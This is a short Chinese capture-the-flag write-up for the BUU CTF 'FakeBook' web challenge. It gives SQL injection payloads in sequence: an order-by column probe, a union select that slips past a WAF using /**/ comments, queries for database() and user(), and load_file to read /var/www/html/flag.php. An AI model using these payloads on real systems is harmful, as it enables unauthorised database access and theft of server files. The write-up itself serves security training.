FakeBook BUU CTF WP

1.题干

 

 dirb一下,发现robots.txt和flag.php和/css和/js

打开flag.php啥都没有:

打开后注册,找到疑似SQL注入漏洞

PayLoad:?no=1%20order%20by%201#

order by 查询列数据。

尝试联合查询,被WAF捕捉。 

用 /**/过滤:PayLoad:?no=1%20union/**/select#

 进入无聊的联合查询:

联合查询:

 发现2存在注入点

查找数据库和数据表

Payload:?no=2 union++select 1,database(),3,4# &  ?no=2 union++select 1,user(),3,4#

发现是root权限(happy)

 且注意到路径(/var/www/html/view.php)

查出flag.php

Payload:?no=2%20union/**/select%201,load_file("/var/www/html/flag.php"),3,4#

找到flag.

提交:

 

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值